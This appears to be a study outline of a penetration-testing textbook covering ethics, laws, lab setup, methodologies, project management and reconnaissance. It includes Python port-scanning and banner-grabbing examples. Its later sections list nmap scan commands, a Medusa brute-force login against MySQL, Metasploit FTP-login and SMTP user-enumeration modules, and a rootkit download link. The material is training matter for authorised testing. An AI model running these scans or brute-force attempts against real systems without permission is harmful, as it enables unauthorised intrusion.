-
Ethics & Hacking
-
Getting Permission to Hack
- What is the difference between White Hat and Black Hat hackers? => “permission”
-
Code of Ethics Canons [(ISC)2]
-
- Protect society, the commonwealth, and the infrastructure
- Act honorably, honestly, justly, responsibly, and legally
- Provide diligent and competent service to principals
- Advance and protect the profession
- It is really difficult to define exactly what constitutes an ethical or unethical hacker
-
Why Stay Ethical?
-
Types of computer hackers
-
Black Hat Hackers
- Those who conduct unauthorized penetration attacks against information systems
- The reason behind this activity ranges from curiosity to financial gain
- In some cases: their activities do not violate the laws of their country
-
White Hat Hackers
- Those individuals who perform security assessments within a contractual agreement
- who’s more capable—the Black Hat hacker or the White Hat hacker?
- Gray Hat Hackers
-
Ethical Standards
- Depending on your certification/location/affiliation
-
Certifications
-
(ISC)2
- Protect society, the commonwealth, and the infrastructure
- Act honorably, honestly, justly, responsibly, and legally
- Provide diligent and competent service to principals
- Advance and protect the profession
-
SANS Institute
- I will strive to know myself and be honest about my capability
- I will conduct my business in a manner that assures that the IT profession
is considered one of integrity and professionalism
- I respect privacy and confidentiality.
-
Employer
- Almost every company has an ethical standards policy
- make sure you include within the contract as part of the recipient’s obligation a clause stating that
they have read and will follow your company’s information security policies and ethics standards.
-
Educational and Institutional Organizations
- Many organizations have instituted their own ethical standards
- making membership within the organization dependent on
acceptance of these ethical standards
-
(ISSA)
- Perform all professional activities and duties in accordance with all applicable laws and the highest ethical principles
- Promote generally accepted information security current best practices and standards
- Maintain appropriate confidentiality of proprietary or otherwise sensitive information encountered in the course of professional activities
- Discharge professional responsibilities with diligence and honesty
- Refrain from any activities which might constitute a conflict of interest or otherwise damage the reputation of employers, the information security profession, or the association, and
- Not intentionally injure or impugn the professional reputation or practice of colleagues, clients, or employers
-
Internet Activities Board: unethical behavior
- Seeks to gain unauthorized access to the resources of the Internet
- Disrupts the intended use of the Internet
- Wastes resources (people, capacity, computer) through such actions
- Destroys the integrity of computer-based information, and/or
- Compromises the privacy of users
-
(IEEE)
- To accept responsibility in making decisions consistent with the safety, health and welfare of the public,
and to disclose promptly factors that might endanger the public or the environment
- To avoid real or perceived conflicts of interest whenever possible and to disclose them to affected parties when they do exist
- To be honest and realistic in stating claims or estimates based on available data
- To reject bribery in all its forms
- To improve the understanding of technology, its appropriate application, and potential consequences
- To maintain and improve our technical competence and to undertake technological tasks for others
only if qualified by training or experience, or after full disclosure of pertinent limitations
- To seek, accept, and offer honest criticism of technical work, to acknowledge and correct errors, and to credit properly the contributions of others
- To treat fairly all persons regardless of such factors as race, religion, gender, disability, age, or national origin
- To avoid injuring others, their property, reputation, or employment by false or malicious action
- To assist colleagues and coworkers in their professional development and to support them in following this code of ethics
-
(OECD)
- Collection Limitation Principle
- Data Quality Principle
- Purpose Specification Principle
- Use Limitation Principle
- Security Safeguards Principle
- Openness Principle
- Individual Participation Principle
- Accountability Principle
-
Computer Crime Laws
-
Types Of Laws
- Civil Law
- Criminal Law
- Administrative/Regulatory Law
-
Type Of Computer Crimes And Attacks
- Denial of service
- Destruction or alteration of information
- Dumpster diving
- Emanation eavesdropping
- Embezzlement
- Espionage
- Illegal content of material
- Information warfare
- Malicious code
- Masquerading
- Social engineering
- Software piracy
- Spoofing of Internet Protocol (IP) addresses
- Terrorism
- Theft of passwords
- Use of easily-accessible exploit scripts
- Network intrusions
-
U.S. Federal Law
- 1970 U.S. Fair Credit Reporting Act
- 1970 U.S. Racketeer Influenced and Corrupt Organization (RICO) Act
- 1973 U.S. Code of Fair Information Practices
- 1974 U.S. Privacy Act
- 1978 Foreign Intelligence Surveillance Act
- 1986 U.S. Computer Fraud and Abuse Act (amended 1996)
- 1986 U.S. Electronic Communications Privacy Act
- 1987 U.S. Computer Security Act
- 1991 U.S. Federal Sentencing Guidelines
- 1994 U.S. Communications Assistance for Law Enforcement Act
- 1996 U.S. Economic and Protection of Proprietary Information Act
- 1996 U.S. Kennedy-Kassebaum Health Insurance and Portability Accountability Act (amended 2000)
- 1996 Title I, Economic Espionage Act
- 1998 U.S. DMCA
- 1999 U.S. Uniform Computers Information Transactions Act
- 2000 U.S. Congress Electronic Signatures in Global and National Commerce Act
- 2001 USA PATRIOT Act
- 2002 E-Government Act, Title III, the FISMA
-
U.S. State Law
- California SB 1386, in 2003
- By 2005, 22 states had enacted similar laws
-
International Laws
-
Canada
- Criminal Code of Canada, Section 342—Unauthorized Use of Computer
- Criminal Code of Canada, Section 184—Interception of Communications
-
United Kingdom
- The Computer Misuse Act (CMA) 1990 (Chapter 18)
- The Regulation of Investigatory Powers Act 2000 (Chapter 23)
- The Anti-terrorism, Crime and Security Act 2001 (Chapter 24)
- The Data Protection Act 1998 (Chapter 29)
- The Fraud Act 2006 (Chapter 35)
- Potentially the Forgery and Counterfeiting Act 1981 (Chapter 45)
- The CMA was recently amended by the Police and Justice Act 2006 (Chapter 48)
- The Privacy and Electronic Communications
-
Australia
- Cybercrime Act 2001
- Crimes Act 1900 (NSW): Part 6, ss 308-308I
- Criminal Code Act Compilation Act 1913 (WA)
-
Malaysia
- Computer Crimes Act 1997 (Act 563)
-
Singapore
- Computer Misuse Act 1993 (Chapter 50A)
-
Venezuela
- Special Computer Crimes Act (Ley Especial de Delitos Informáticos)
-
European Union
- Safe Harbor and Directive 95/46/EC
-
Getting Permission to Hack
- Confidentiality Agreement
- Company Obligations
- Contractor Obligations
- Auditing and Monitoring
- Conflict Management
-
Setting up Your Lab
-
Targets in a Pentest Lab
-
Problems with Learning to Hack
- No legitimate targets online to practice against.
- A person cannot build a pentest scenario and then learn much from it, since they already know where the flaws are
- The only way to learn is to practice against scenarios created by others
-
Real-World Scenarios
- Learning to hack using real-world servers is risky
- Production labs are expensive and availability to the labs is often limited
- unless you have the money to throw at the problem,
you will need to develop a personal lab
-
Turn-Key Scenarios
- The disadvantage to turn-key pentest scenarios is that
they only imitate real-world servers but may not do so faithfully
- Despite the disadvantages, turn-key scenarios are the
preferred method to learning how to conduct a penetration test.
-
What Is a LiveCD?
-
De-ICE
- LiveCDs that boot into fully working Linux servers containing real-world misconfigurations and challenges
- Available since January 2007
- The challenge is to discover what applications are misconfigured or exploitable
and to obtain unauthorized access to the root account
- A list of possible vulnerabilities
- Bad/weak passwords
- Unnecessary services
- ftp
- telnet
- rlogin
- Unpatched services
- Too much information available (contact info, and so forth)
- Poor system configuration
- Poor/no encryption methodology
- Elevated user privileges
- No Internet Protocol (IP) Security filtering
- Incorrect firewall rules (plug in and forget?)
- Clear-text passwords
- Username/password embedded in software
- No alarm monitoring
- Well-known exploits are not included in the De-ICE challenges
-
Hackerdemia
- designed to be a training platform where various
hacker tools could be used and learned
- Developed on the Slax Linux
-
Open Web Application Security Project (OWASP)
- www.owasp.org
- One of the OWASP projects is WebGoat
- categories of Web-based attack vectors within WebGoat
- Code quality
- Unvalidated parameters
- Broken access control
- Broken authentication and session management
- Cross-site scripting (XSS)
- Buffer overflows
- Injection flaws
- Insecure storage
- Denial of service (DoS)
- Insecure configuration management
- Web services
- AJAX security
-
Virtual Network Pentest Labs
-
Keeping It Simple
- Cost is usually a driver in trying to keep personal labs small and manageable
- There is also no need to maintain a large library of applications
- Unless a personal lab retains any sensitive data, a lot of security controls can be eliminated
-
Virtualization Software
- VMware (the hypervisor)
- Guest images: BackTrack (attack system) and De-ICE (targets)
-
Protecting Penetration Test Data
-
Encryption Schemas
- Data Encryption
- Data Hashing
-
Securing Pentest Systems
- Encrypt the hard drive
- Lock hard drives in a safe
- Store systems in a physically controlled room
- Perform penetration tests against the pentest systems
- Mobile Security Concerns
-
Wireless Lab Data
-
two separate labs should be created
- a wireless lab designed to practice wireless hacking
- a separate lab that can be used to conduct system attacks
-
Advanced Pentest Labs
-
Hardware Considerations
- Routers
-
Firewalls
- Firewall evasion is an advanced skill that needs practice
- Stateful and stateless firewalls present different problems as well
-
Intrusion Detection
- the most widely used Intrusion Detection System/Intrusion Prevention System (IDS/IPS) is the Open Source application Snort
- www.snort.org
-
Hardware Configuration
- De-ICE Network
- Challenges
- Network Architecture
-
Operating Systems and Applications
-
Operating Systems
- www.packetstormsecurity.org/UNIX/penetration/rootkits/
- Packet Storm links to downloadable rootkits
-
Applications
- remote-db.com
-
Analyzing Malware—Viruses and Worms
- Virtual Versus Nonvirtual Labs
-
Creating a Controlled Environment
- www.xen.org,
- Possible lab configuration using Xen hypervisor.
- all wireless communication must be disabled
-
Harvesting Malware
- connecting a honeypot directly to the Internet
- This allows Nepenthes to harvest malware directly from Internet attacks
-
Information Analysis
- tools
- Wireshark
- reverse engineering
-
Other Target Ideas
-
CTF Events
- DefCon CTF
- www.openctf.com
- www.captf.com/wiki/Main_Page
-
Web-Based Challenges
- www.hackthissite.org/
- Crackmes.de
- www.hellboundhackers.org
- www.try2hack.nl/
- Vulnerability Announcements
-
Methodologies & Frameworks
-
Information System Security Assessment Framework
- the ISSAF is a peer-reviewed process that provides in-depth
information about how to conduct a penetration test
- a professional penetration tester will use most, if not all, of the tools described in the ISSAF
- numerous examples of how tools are used within a pentest engagement
- a serious problem with the ISSAF : lack of updates
- the ISSAF document was in 2006
-
layers
- Information Gathering
- Network Mapping
- Vulnerability Identification
- Penetration
- Gaining Access and Privilege Escalation
- Enumerating Further
- Compromise Remote Users/Sites
- Maintaining Access
- Covering Tracks
-
targets
- Networks
- Hosts
- Applications
- Databases
-
phases
-
Planning and Preparation—Phase I
- the steps to exchange initial information, plan, and prepare for the test
- Before testing, a formal Assessment Agreement is signed by both parties
- Identification of contact individuals from both side
- Opening meeting to confirm the scope, approach, and methodology
- Agree to specific test cases and escalation paths
-
Assessment—Phase II
- Network Security
- Password Security Testing
- Switch Security Assessment
- Router Security Assessment
- Firewall Security Assessment
- Intrusion Detection System Security Assessment
- Virtual Private Network Security Assessment
- Antivirus System Security Assessment and Management Strategy
- Storage Area Network Security
- Wireless Local Area Network Security Assessment
- Internet User Security
- AS 400 Security
- Lotus Notes Security
- Host Security
- Unix/Linux System Security Assessment
- Windows System Security Assessment
- Novell Netware Security Assessment
- Web Server Security Assessment
- Application Security
- Web Application Security Assessment
- SQL Injections
- Source Code Auditing
- Binary Auditing
- Database Security
- Remote enumeration of databases
- Brute-forcing databases
- Process manipulation attack
- End-to-end audit of databases
- Social Engineering
-
Reporting, Clean-up, and Destroy Artifacts—Phase III
- Reporting
- types
- verbal
- written
- the final written report
- Management summary
- Project scope
- Penetration test tools used
- Exploits used
- Date and time of the tests
- All outputs of the tools and exploits
- A list of identified vulnerabilities
- Recommendations to mitigate identified
vulnerabilities, organized into priorities
- Clean-up and Destroy Artifacts
-
Open Source Security Testing Methodology Manual
-
OSSTMM
- Introduced to the Information System Security industry in 2000
- The current release is version 3.0
- maintained by the Institute for Security and Open Methodologies
- www.isecom.org
-
Rules of Engagement
- Project Scope
- Confidentiality and Nondisclosure Assurance
- Emergency Contact Information
- Statement of Work Change Process
- Test Plan
- Test Process
- Reporting
-
Channels
- Human Security
- Physical Security
- Communications
- Telecommunications
-
Data Networks
- Network Surveying
- Enumeration
- Identification
- Access Process
- Services Identification
- Authentication
- Spoofing
- Phishing
- Resource Abuse
-
Modules
-
Phase I: Regulatory
- Posture Review
- Logistics
- Active Detection Verification
-
Phase II: Definitions
- Visibility Audit
- Access Verification
- Trust Verification
- Controls Verification
-
Phase III: Information Phase
- Process Verification
- Configuration Verification
- Property Validation
- Segregation Review
- Exposure Verification
- Competitive Intelligence Scouting
-
Phase IV: Interactive Controls Test Phase
- Quarantine Verification
- Privileges Audit
- Survivability validation
- Alert and Log Review
-
Pentest Project Management
-
Quantitative, Qualitative, and Mixed Methods
-
Quantitative Analysis
- we rely on numbers—and lots of them
- Don’t always assume that the measurable data gathered are always correct.
-
Qualitative Analysis
- Relies on expert opinion where no hard measurement exists (quantitative analysis, by contrast, relies strictly on measurable data)
- The origin of an attack, for example, is rarely something that can be measured
-
difference between threat and risk
- a threat is something that can do damage to a system
- The risk describes the likelihood and impact of the threat
- The disadvantage of qualitative analysis: opinions can be biased and influenced by external factors
- to reduce bias: use anonymous submissions
-
Mixed Method Analysis
- The use of just one method to determine metrics is insufficient
- requires a larger amount of time and resources
- Pentest findings need to be written to match stakeholder expectations
-
Management of a Pentest
-
Introduction to PMBOK
- First published by the PMI in 1987
- attempts to standardize project management practices and information
-
project life cycle
-
Initiating Process Group
- Develop Project Charter
- Identify Stakeholders
-
Planning Process Group
- Develop Project Management Plan
- Collect Requirement
- translating business objectives into technical requirements
- Limitations should also be collected
- Define Scope
- objectives
- requirements
- boundaries
- assumptions
- deliverables of a project
- Create WBS
- Work Breakdown Structure
- actual work needs to be done to complete the project
- The WBS is not a schedule
- Sequence Activities
- Estimate Activity Resources (types and quantities)
- material
- people
- equipment
- Estimate Activity Durations
- Develop Schedule
- Estimate Costs
- the project may not be worth the cost
compared to the revenue the project will generate
- Determine Budget
- Plan Quality
- Develop Human Resource Plan
- Plan Communications
- Plan Risk Management
- Identify Risks
- Perform Qualitative (and Quantitative) Risk Analysis
- Plan Risk Responses
- Plan Procurements
-
Executing Process Group
- Direct and Manage Project Execution
- Perform Quality Assurance
- Acquire Project Team
- Develop Project Team
- Manage Project Team
- Distribute Information
- Manage Stakeholder Expectations
- Conduct Procurements
-
Closing Process Group
- Close Project or Phase
- Close Procurements
-
Monitoring and Controlling Process Group
- Monitor and Control Project Work
- Perform Integrated Change Control
- Verify Scope
- Control Scope
- Control Schedule
- Control Costs
- Perform Quality Control
- Report Performance
- Monitor and Control Risks
- Administer Procurements
-
Project Team Members
-
Roles and Responsibilities
- Team Champion
- Project Manager
- Pentest Engineers
-
Organizational Structure
- Functional Organization
- Matrix Organization
- Projectized Organization
-
Project Management
-
Initiating Stage
-
processes
- develop project charter
- identify stakeholders
-
potential stakeholders
- Client/Customer Organization
- Project Sponsor
- Point of Contact
- Senior Management
- Target System/Network Manager
- Target System/Network Administrators
- Network Administrators
- Network Defense Administrators
- Penetration Test Team
- Project Manager
- Functional Manager
- Senior Management
- Pentest Engineers
- Procurement Department
- Government Agencies
- Local law Enforcement
- Local Law Enforcement Investigators
- Federal Law Enforcement
- Third-Party Groups
- Internet Service Providers
- Subject-Matter Experts/Consultants
-
Planning Stage
-
Executing Stage
-
Monitoring and Controlling
-
Closing Stage
- Formal Project Review
- Effort Evaluation
- Identification of New Projects
-
Future Project Priority Identification
- Overall security risk to the client
- Cost of each project
- Financial gain of each project
- Length of time needed for each project
- Skills needed to successfully complete each project
- Staff/resource availability
- Project sponsor/requestor
-
Solo Pentesting
- Initiating Stage
-
Planning Process Stage
- Collect Requirements
- Define Scope
- Estimate Activity Durations
- Develop Schedule
- Plan Quality
- Plan Communications
- Identify Risks
- Plan Risk Responses
- Plan Procurements
-
Executing Stage
- Direct and Manage Project Execution
- Manage Stakeholder Expectations
-
Closing Stage
- ensures that all the reporting is completed
- concludes the contract
-
Monitoring and Controlling
- Monitor and Control Project Work
- Verify Scope
- Control Scope
- Perform Quality Control
- Monitor and Control Risks
-
Archiving Data
-
Should You Keep Data?
-
two schools
- keep everything
- keep nothing
- Legal Issues
-
E-mail
- some e-mails will contain sensitive data that should be protected
- Proper encryption and access control mechanisms must be in place
- Findings and Reports
-
Securing Documentation
- Access Controls
- Archival Methods
- Archival Locations
- Destruction Policies
-
Cleaning up Your Lab
-
Archiving Lab Data
- Proof of Concepts
- Malware Analysis
-
Creating and Using System Images
- License Issues
- Virtual Machines
- “Ghost” Images
-
Creating a “Clean Shop”
- Sanitization Methods Using Hashes
- Change Management Controls
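The "sanitization using hashes" idea above, turned into a baseline/verify pair. This is an added example, not the book's or any vendor's tooling: the directory layout and the "known bad" digest it checks against are whatever you feed it, and the sample files in the demo are constructed.

```python
import hashlib
import os
from pathlib import Path

# Added example (not from the original outline): record a digest of every
# file on a freshly built lab image, then prove the image is still clean (or
# show exactly what changed) before the next engagement. Hash values and
# paths are computed from whatever tree you point it at; nothing is built in.


def hash_file(path, algo="sha256", chunk=1 << 16):
    """Stream a file through the chosen hash so large disk images fit in RAM."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def baseline(root, algo="sha256"):
    """Walk `root` and map relative path -> digest for every regular file.

    Take this once, right after the image is built and before any pentest
    data touches it, and keep the result off the lab machine (a compromised
    host can rewrite its own baseline)."""
    root = Path(root)
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                digests[p.relative_to(root).as_posix()] = hash_file(p, algo)
    return digests


def verify(root, expected, algo="sha256"):
    """Compare the live tree with a stored baseline.

    Returns {'modified': [...], 'added': [...], 'removed': [...]}; anything
    in 'added' is exactly the kind of leftover (loot, tools, proof-of-concept
    code) that must not leak into the next client's engagement."""
    current = baseline(root, algo)
    return {
        "modified": sorted(p for p in expected if p in current and current[p] != expected[p]),
        "added": sorted(set(current) - set(expected)),
        "removed": sorted(set(expected) - set(current)),
    }


def is_clean(report):
    """A 'clean shop' is an empty report, nothing less."""
    return not (report["modified"] or report["added"] or report["removed"])


def matches_blocklist(digests, bad_hashes):
    """Paths whose digest equals a known sample (e.g. malware retained from an
    analysis job) that must never survive on a sanitized image."""
    bad = {h.lower() for h in bad_hashes}
    return sorted(p for p, h in digests.items() if h.lower() in bad)


if __name__ == "__main__":
    import json
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    print(json.dumps(baseline(root), indent=2))
```

Run it once to produce the baseline (redirect the JSON to a file kept outside the lab), and call `verify()` against that file before the image is reused; a change-management ticket should reference the baseline that was checked.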
-
Planning for Your Next Pentest
-
Risk Management Register
- Creating a Risk Management Register
- Prioritization of Risks and Responses
-
Knowledge Database
- Creating a Knowledge Database
- Sanitization of Findings
- Project Management
-
Knowledge Database
- Points of contacts internal to the company
- Points of contacts of client organizations
- Resource vendors
- List of subject-matter experts
- List of past team members and current contact information
- Contracts
- Statements of work
- Project templates
-
After-Action Review
-
Project Assessments
- Scheduling issues (too little time, too much time, and so forth)
- Resource availability
- Risk management
- Project scope issues (too broad, too narrow, and so forth)
- Communication issues
-
Team Assessments
- Technical strengths
- Technical weaknesses
- Level of effort within each component of the project
- Team training ideas
- Time management skills
- Obstacles that prevented effective teamwork
- Overall opinion on productivity of the team
- Training Proposals
-
Information Gathering
-
Passive Information Gathering
-
Web Presence
-
Tools
- Web browser
- Dogpile.com
- Alexa.org
- Archive.org
- Shodanhq.com
- dig
- nslookup
-
Informations
- Web site address(es)
- Web server type
- Server locations
- Dates, including “date last modified”
- Web links—both internally and externally
- Web server directory tree
- Technologies used (software/hardware)
- Encryption standards
- Web-enabled languages
- Form fields (including hidden fields)
- Form variables
- Method of form postings
- Company contact information
- Meta tags
- Any comments within Web pages
- E-commerce capabilities
- Services and products offered
-
Exercise: gathering info about Nmap
- Step 1 : google "Nmap"
- Results
- Nmap.org
- Insecure.org
- Sectools.org
- Step 2 : Alexa "Nmap.org"
- Alexa.org believes => Nmap.org and Insecure.org are related
- Nmap.org permits subdomains
- scanme.Nmap.org.
- Step 3: nmap.org itself
- Archive.org
- allows to see how the Website has changed over the years
- it often has information no longer available through Google
- Archive.org does not provide the latest 6 months of archive
- Turn Off All Access to Target System
- Netcraft.com
- Google
- site:cgi.Insecure.org
-
Corporate Data
- location
- employee information
- network information
-
Google maps
- adjoining buildings
- buildings across
- the street
- entrances
- window locations
- ingress/egress routes
- lighting
- cameras
- access controls
- Google Earth
- Bing maps
-
Whois and DNS
- Whois
-
dig
- query nameservers
- dig ns nmap.org
- nslookup
-
Additional Internet Resources
- http://freenews.maxbaud.net
-
The target's mail server should be checked against the SPAM blacklists (DNSBLs)
- a listing may indicate that the mail server was compromised in the past
- www.dnsbl.info
- job sites
-
Active Information Gathering
-
DNS Interrogation
- version number of the Berkeley Internet Name Domain (BIND) server, read from the CHAOS-class TXT record version.bind (administrators can hide or fake it)
- ns1.titan.net
-
E-mail Accounts
- Goal: create a list of users that reside on the system
- helpful in any brute-force attack & login attempt
- social engineering purposes
- Perimeter Network Identification
-
Network Surveying
- Goal: identify how many systems reside within
the network and their associated IP address
-
Use Nmap
- nmap -sF 192.168.1.1-255
- Use netdiscover
-
Vulnerability Identification
-
Port Scanning
-
Target Verification
-
Active Scans
- Ping
- Msgs used to determine if the target is alive
- Echo Request
- Echo Reply
- initial request: set the Type field to “8” & send it
- If the target system is alive it returns an Echo Reply datagram with the Type field set to "0"
- Results are not always accurate => protection against random scans
- nmap -sP 192.168.1.123 (host discovery only; current Nmap spells this option -sn)
- ICMP echo request
- TCP ACK packet
- nmap -sP 192.168.1.0/24
- Passive Scans
-
UDP Scanning
-
disadvantages
- slow when compared to TCP scans
- most exploitable applications use TCP
-
possible results returned (UDP scan)
- Open
- the existence of an active UDP port
- Open/filtered
- No response was received
- Closed
- “port unreachable”
- Filtered
- an ICMP unreachable other than "port unreachable" came back (a filter in the path answered)
- If OPEN or CLOSED => the target is ALIVE
- If OPEN/FILTERED or FILTERED => an IPS or firewall is intercepting => we need to adjust our attack
- UDP scans are not something most firewall administrators think about
-
TCP Scanning
-
TCP Connect Scan (-sT)
- most reliable method of determining port activity
- complete three-way TCP handshake
- may be noticed by IDSes
- advantage: we will know for certain whether an
application is truly present or not
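The UDP result states and the connect() scan described above, written directly against the socket API so the states can be seen coming from the kernel's own responses. This is an added example, not Nmap's code or the book's; the listeners it probes are throwaway sockets on 127.0.0.1 built by the demo itself, so it runs offline.

```python
import socket
import threading

# Added example (not from the original outline, not Nmap's code): a TCP
# connect() probe (what -sT does) and a UDP probe (one probe of -sU), plus
# constructed local targets so the four result states can be observed.

TIMEOUT = 1.0


def tcp_connect_probe(host, port, timeout=TIMEOUT):
    """Full three-way handshake, like nmap -sT.

    'open'     connect() completed: an application really is listening
    'closed'   the target answered the SYN with RST (ECONNREFUSED)
    'filtered' nothing came back, or an ICMP unreachable arrived
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, TimeoutError):
            return "filtered"
        except OSError:            # EHOSTUNREACH, ENETUNREACH, ...
            return "filtered"
        return "open"


def udp_probe(host, port, payload=b"\x00", timeout=TIMEOUT):
    """One datagram, like a single probe of nmap -sU.

    A *connected* UDP socket makes the kernel hand us the ICMP
    port-unreachable a closed port sends back, as ECONNREFUSED on recv():
      data returned           -> 'open'
      ICMP port unreachable   -> 'closed'
      other ICMP unreachable  -> 'filtered'      (some other OSError)
      silence                 -> 'open|filtered' (no way to tell)
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        s.send(payload)
        try:
            s.recv(1024)
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, TimeoutError):
            return "open|filtered"
        except OSError:
            return "filtered"
        return "open"


def host_is_alive(states):
    """'open' or 'closed' proves a host answered; 'filtered' and
    'open|filtered' prove nothing, which is why an all-filtered UDP scan
    means a firewall/IPS is in the path, not that the host is down."""
    return any(s in ("open", "closed") for s in states)


def _udp_echo_once(sock):
    data, addr = sock.recvfrom(1024)
    sock.sendto(data, addr)


def local_demo():
    """Constructed targets on 127.0.0.1: a listening TCP port, the same port
    after it is closed, an echoing UDP port, and the same port once closed."""
    results = {}
    tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp.bind(("127.0.0.1", 0))
    tcp.listen(1)
    port = tcp.getsockname()[1]
    results["tcp_open"] = tcp_connect_probe("127.0.0.1", port)
    tcp.close()
    results["tcp_closed"] = tcp_connect_probe("127.0.0.1", port)

    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind(("127.0.0.1", 0))
    port = udp.getsockname()[1]
    t = threading.Thread(target=_udp_echo_once, args=(udp,), daemon=True)
    t.start()
    results["udp_open"] = udp_probe("127.0.0.1", port)
    t.join()
    udp.close()
    results["udp_closed"] = udp_probe("127.0.0.1", port)
    results["alive"] = host_is_alive(list(results.values()))
    return results


if __name__ == "__main__":
    print(local_demo())
```

Against a remote host, only the ICMP that actually reaches you shapes the verdict: a firewall that silently drops both the probe and the ICMP turns every UDP port into "open|filtered", which is the case the outline says needs a different approach.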
-
TCP SYN Stealth Scan (-sS)
- creates a half-open connection
- this might help against IDSes
- advantage: speed
-
Perimeter Avoidance Scanning
-
ACK Scan (-sA)
- send an ACK to the target system
- a stateless firewall assumes the packet belongs to an already established connection and lets it through
- Null Scan Attack (-sN)
- FIN (-sF) and Xmas Tree (-sX) Scans
-
System Identification
-
Active OS Fingerprinting
- Nmap can scan a system and identify the OS
- nmap -O 192.168.1.100
- Another tool we can use is xprobe2
- xprobe2 -p tcp:80:open 192.168.1.100
-
Passive OS Fingerprinting
- Requires a lot of patience
- Objective: Capture TCP packets stealthily
- p0f Scan
- ARP poisoning attack
-
Services Identification
-
Banner Grabbing
- Launch Nmap using the -sV => grab banner information from apps
- Banner grabbing using Telnet
-
Enumerating Unknown Services
- Connect to the ports manually and see what type of information is returned
- After we connect(Using NetCat), we can send random data
- nc pWnOS 1000
- Connecting to target using smbclient.
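Banner grabbing the way the netcat/telnet step above does it, as an added example (not from the book or any tool's source): connect, read whatever the service volunteers, and if it stays silent send a probe and read again. The stand-in service it runs against is a constructed one-connection listener on 127.0.0.1; the hostnames and version strings in the demo are made up, but the banner formats (the SSH "SSH-proto-software" line, the 220 greeting, the HTTP Server: header) are the real wire formats.

```python
import socket
import threading

# Added example (not the outline's own material): banner grabbing as done by
# "nc host port" / telnet, plus a constructed local service so it runs
# offline. Demo hosts and versions are invented.

DEFAULT_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"


def grab_banner(host, port, timeout=2.0, probe=DEFAULT_PROBE):
    """Connect and return the first thing the service says.

    Chatty protocols (SSH, SMTP, FTP, POP3) talk first. If nothing arrives
    within the timeout the service is waiting on us, so send `probe` and
    read again: the 'send some data and see what comes back' step."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
        except (socket.timeout, TimeoutError):
            s.sendall(probe)
            try:
                data = s.recv(1024)
            except (socket.timeout, TimeoutError):
                data = b""
    return data.decode("latin-1").strip()


def identify(banner):
    """Turn a banner into a service/version guess.

    SSH servers must send 'SSH-<protoversion>-<softwareversion>' before
    anything else; '1.99' means an SSH-2 server that still accepts SSH-1."""
    if banner.startswith("SSH-"):
        parts = banner.split("-", 2)
        proto = parts[1] if len(parts) > 1 else ""
        software = parts[2].split()[0] if len(parts) > 2 and parts[2] else ""
        return {"service": "ssh", "protocol": proto, "software": software}
    if banner.startswith("220 "):
        # SMTP and FTP both greet with 220; the text normally names the daemon
        return {"service": "smtp/ftp", "greeting": banner[4:]}
    if banner.startswith("HTTP/"):
        server = ""
        for line in banner.splitlines():
            if line.lower().startswith("server:"):
                server = line.split(":", 1)[1].strip()
        return {"service": "http", "software": server}
    return {"service": "unknown", "raw": banner}


def fake_service(banner=None, reply=b""):
    """Constructed target: serves exactly one connection on 127.0.0.1.
    With `banner` it speaks first (SSH-like); otherwise it waits for the
    client's probe and answers `reply` (HTTP-like). Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            if banner is not None:
                conn.sendall(banner)
            else:
                conn.recv(1024)
                conn.sendall(reply)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    p = fake_service(banner=b"SSH-1.99-OpenSSH_4.3\r\n")
    print(identify(grab_banner("127.0.0.1", p)))
```

Treat the result as a claim, not a fact: banners are trivially edited, which is why the outline's later advice to never trust one tool applies here too.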
-
Vulnerability Identification
- http://nvd.nist.gov/
- If we were simply conducting a risk assessment without conducting a penetration test, this is where we would probably stop
-
Vulnerability Exploitation
-
Introduction
- In this chapter, we let automated tools do what we did by hand in chapter 7
- Without understanding how to gather the application and OS version information yourself, you cannot accurately understand how automated tools gather the same information
- if we want to call ourselves professionals, we cannot simply let our tools do our work for us
-
four steps
- Find proof of concept code/tool
-
Test proof of concept code/tool
- testing the exploit against a test server first
- we really cannot know what will happen when we launch the exploit, unless we examine the code first, or test it within a test environment
- an exploit can have different results, including crashing the target and losing all data and functionality
- Write your own proof of concept code/tool
- Use proof of concept code/tool against target
-
Automated Tools
-
The top 10 vulnerability scanners
- Nessus (open source/commercial)
- OpenVAS (open source)
- Core Impact (commercial)
- Nexpose (commercial)
- GFI LanGuard (commercial)
- QualysGuard (commercial)
- MBSA (free, Microsoft)
- Retina (commercial)
- Secunia PSI (free)
- Nipper (commercial)
-
Vulnerability exploitation tools
- Metasploit (open source/commercial)
- Core Impact (commercial)
- sqlmap (open source)
- Canvas (commercial)
- Netsparker (commercial)
-
Nmap Scripts
- /usr/share/nmap/scripts
- -A runs the default script set (together with OS detection, version detection and traceroute); -sC runs only the default scripts and --script=<name> selects specific ones
- nmap -A 10.0.3.125
-
Default Login Scans
- Frequent issue: The use of default or weak passwords on applications
- There are multiple tools we can use: Medusa, Hydra...
- #> medusa -h <targetIP> -u root -p password -e ns -O mysql.medusa.out -M mysql
- OpenVAS
-
JBroFuzz
- Fuzzing is a process where malformed or random data are passed to an
application in the hope of triggering an anomaly (a crash, an error, unexpected behaviour)
- Fuzzing can take quite a while to complete
- We can use a fuzzer whenever we discover a place to insert user-supplied data in an application
-
Metasploit
-
FTP
- use auxiliary/scanner/ftp/anonymous
- auxiliary/scanner/ftp/ftp_login
-
Simple Mail Transfer Protocol
- can be used to identify usernames on a target system or within the organization
- User enumeration via SMTP
- use auxiliary/scanner/smtp/smtp_enum
- show options
